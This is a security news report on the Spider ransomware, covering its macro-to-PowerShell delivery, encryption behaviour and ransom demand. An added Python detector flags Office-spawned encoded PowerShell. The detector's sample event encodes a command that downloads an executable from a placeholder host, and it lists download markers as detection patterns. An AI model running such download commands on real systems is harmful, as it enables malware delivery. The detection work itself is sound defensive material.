Security researchers reported that, while analyzing a mid-scale campaign over the weekend, they found a new ransomware family. The new threat is called Spider ransomware and it uses decoy documents auto-synced to enterprise cloud storage and collaboration applications.
According to the experts, the Spider ransomware is being distributed via an Office document which targets users in Bosnia and Herzegovina, Serbia, and Croatia.
The spam emails are styled as debt-collection notices from the sender to the recipient, tricking the user into opening the attached file.
However, the obfuscated macro code embedded in the Office document instead launches a Base64-encoded PowerShell script that downloads the malicious payload.
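The macro-to-PowerShell chain described above is exactly what a process-creation detection should catch. The following is an added example (not from the original report or from Netskope's tooling): it decodes a `-EncodedCommand` argument and scores a constructed Sysmon-style event on three signals; the Office parent set, the download-marker list and the sample events are assumptions.

```python
import base64
import re

# Office images that should not normally spawn a shell (the page's lure: Office macro -> PowerShell).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
# Substrings in a decoded script that indicate it fetches something from the network.
DOWNLOAD_MARKERS = ("downloadfile", "downloadstring", "invoke-webrequest", "net.webclient")
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

def encode_command(script: str) -> str:
    """Encode a script as PowerShell's -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload from a command line, or None if absent or invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def assess_event(event: dict) -> dict:
    """Score one process-creation event (parent_image, image, command_line) and explain why."""
    reasons = []
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    image = event["image"].rsplit("\\", 1)[-1].lower()
    if image == "powershell.exe" and parent in OFFICE_PARENTS:
        reasons.append(f"{parent} spawned powershell.exe")
    decoded = decode_encoded_command(event["command_line"])
    if decoded is not None:
        reasons.append("encoded command present")
        if any(marker in decoded.lower() for marker in DOWNLOAD_MARKERS):
            reasons.append("decoded script downloads content")
    severity = "high" if len(reasons) >= 3 else "medium" if reasons else "low"
    return {"severity": severity, "reasons": reasons, "decoded": decoded}

# Constructed sample events, not real telemetry; the first mimics the macro -> PowerShell chain
# and its URL is a placeholder under the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoP -W Hidden -enc "
     + encode_command("(New-Object Net.WebClient).DownloadFile('http://example.invalid/p', \"$env:TEMP\\p.exe\")")},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -File C:\scripts\backup.ps1"},
]
```

Running `assess_event` over the first sample yields severity `high` with all three reasons, while the benign scheduled-script launch scores `low`.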
Once the system is infected, the ransomware starts encrypting the user’s files and adds the ‘.spider’ extension to each affected file.
Alongside the encrypter, a decrypter component is dropped to display the user interface and let victims decrypt their files once they have a decryption key. It is launched together with the encrypter but runs in the background until the encryption process has completed.
According to Netskope’s expert Amit Malik, the Spider decrypter monitors system processes and prevents the launch of tools such as taskmgr, procexp, msconfig, regedit, cmd, outlook, winword, excel, and msaccess.
During the encryption process, the Spider ransomware skips files in the following folders: tmp, Videos, winnt, Application Data, Spider, PrefLogs, Program Files (x86), Program Files, ProgramData, Temp, Recycle, System Volume Information, Boot, and Windows.
When the encryption process is completed, the decrypter displays a warning (available in English and Croatian) informing users how to decrypt their files.
Additionally, there is a help section which includes links and references to the resources needed to make the payment which is approximately $120.
“As ransomware continues to evolve, administrators should educate employees about the impact of ransomware and ensure the protection of the organization’s data by making a regular backup of critical data. In addition to disabling macros by default, users must also be cautious of documents that only contain a message to enable macros to view the contents and also not to execute unsigned macros and macros from untrusted sources,” the Netskope researchers state.